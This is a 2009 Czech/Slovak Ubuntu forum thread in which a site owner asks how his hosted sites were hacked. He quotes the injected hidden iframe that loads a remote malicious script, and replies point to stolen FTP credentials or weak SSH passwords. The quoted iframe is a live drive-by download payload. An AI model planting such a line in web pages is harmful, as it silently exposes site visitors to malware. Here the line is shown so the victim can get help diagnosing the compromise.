Fórum Ubuntu CZ/SK

Ostatní => Ubuntu Server => Téma založeno: romciiik 16 Dubna 2009, 14:58:03

Název: Ochrana pred hacknutím [vyriešené]
Přispěvatel: romciiik 16 Dubna 2009, 14:58:03

ahoj,
dnes ma hackli ale netuším ako..
každý súbor ktorý má názov "index*.*" má vložený kód za html tag "<body>" a ak neexistuje tak na konci suboru:

Kód: [Vybrat]

<iframe src="http://hotslotpot.cn/in.cgi?income64" width=1 height=1 style="visibility: hidden"></iframe>Tento kód neodporúčam spúšťať! Nemám tušenia čo to má byť!
Skúsil som spustiť to "cgi" a načítalo mi do framu pdf ktoré (podla zdrojáka usudzujem) je generované javascriptom.
útok pravdepodobne prišiel z IP 94.247.3.150
Neviete niekto náhodou ako sa mi to mohlo stať, resp. ako mám zabezpečiť aby sa to už nestalo?

Název: Re: Ochrana pred hacknutím
Přispěvatel: stderr 16 Dubna 2009, 15:56:43

1. moznost:
Pouzivas Total Commander? Pak neukladej hesla pro FTP, maji slaby sifrovani. Vir ve Win je prelouska, prihlasi na FTP a do indexu zapise tento iframe (v ruznych obmenach)
2. moznost:
Utok na ssh. Takze pouzivat silny hesla.

Název: Re: Ochrana pred hacknutím
Přispěvatel: kkaarreell 16 Dubna 2009, 18:53:19

moznosti je milion.. univerzalni rada neexistuje, snad jen nezapinat pocitac ci jej nepripojovat k netu.. a kdyz uz, tak pak neprovozovat sluzby (jako webserver,...), kterym nerozumis.
ze stejnyho duvodu ti nikdo nerekne, v cem to bylo.. moznosti je opet plno a bylo by treba poradne kontroly komplu.

Název: Re: Ochrana pred hacknutím
Přispěvatel: Pavel Půlpán 16 Dubna 2009, 18:57:28

Citace: kkaarreell  16 Dubna 2009, 18:53:19

a kdyz uz, tak pak neprovozovat sluzby (jako webserver,...), kterym nerozumis.

(K)ámen! 8) Čím víc služeb běží, tím je server děravější. Co se týče hesel, tak často měnit a nešetřit na nich... já si je generuju jednou tejdně a pak se mi Ntz směje, že si je nepamatuju. ;D

Název: Re: Ochrana pred hacknutím
Přispěvatel: romciiik 17 Dubna 2009, 22:11:24

toto nie je konkrétne na vlastnom stroji ale na profi hostingu (už na dvoch rôznych!!). stalo sa to na dvoch stránkach ktoré mám na starosti.
ÁNO total commander mám, používam, už nebudem!
Náhoda (?) je že na tích konkrétnych dvoch doménach som mal nainštalovaný Piwik ( http://piwik.org/ ). je to opensource projekt, nechcem ho obvinovat ale na inde sa to zatial neprejavilo.

po opravení všetných odkazov na "vírus"  sa to tam vložilo za pár hodín znovu. prvý bol na servri (kontrolovaný čas modifikácie cez FAR) zmenený index.php v priečinku piwik. po odstánení piwiku sa to (zatiaľ) neobnovilo.

Neinštalovať piwik a pomeniť heslá a malo by to byť OK?

Ďakujem za cenné rady!!

Název: Re: Ochrana pred hacknutím
Přispěvatel: kkaarreell 22 Dubna 2009, 08:37:41

http://svatas.blog.root.cz/2009/04/21/a-total-commander-pouzivate/

Název: Re: Ochrana pred hacknutím
Přispěvatel: romciiik 25 Dubna 2009, 12:08:12

viem viem, videl som už, aj čítal. vďaka za snahu, predsa len ste tu na problém prišli skôr.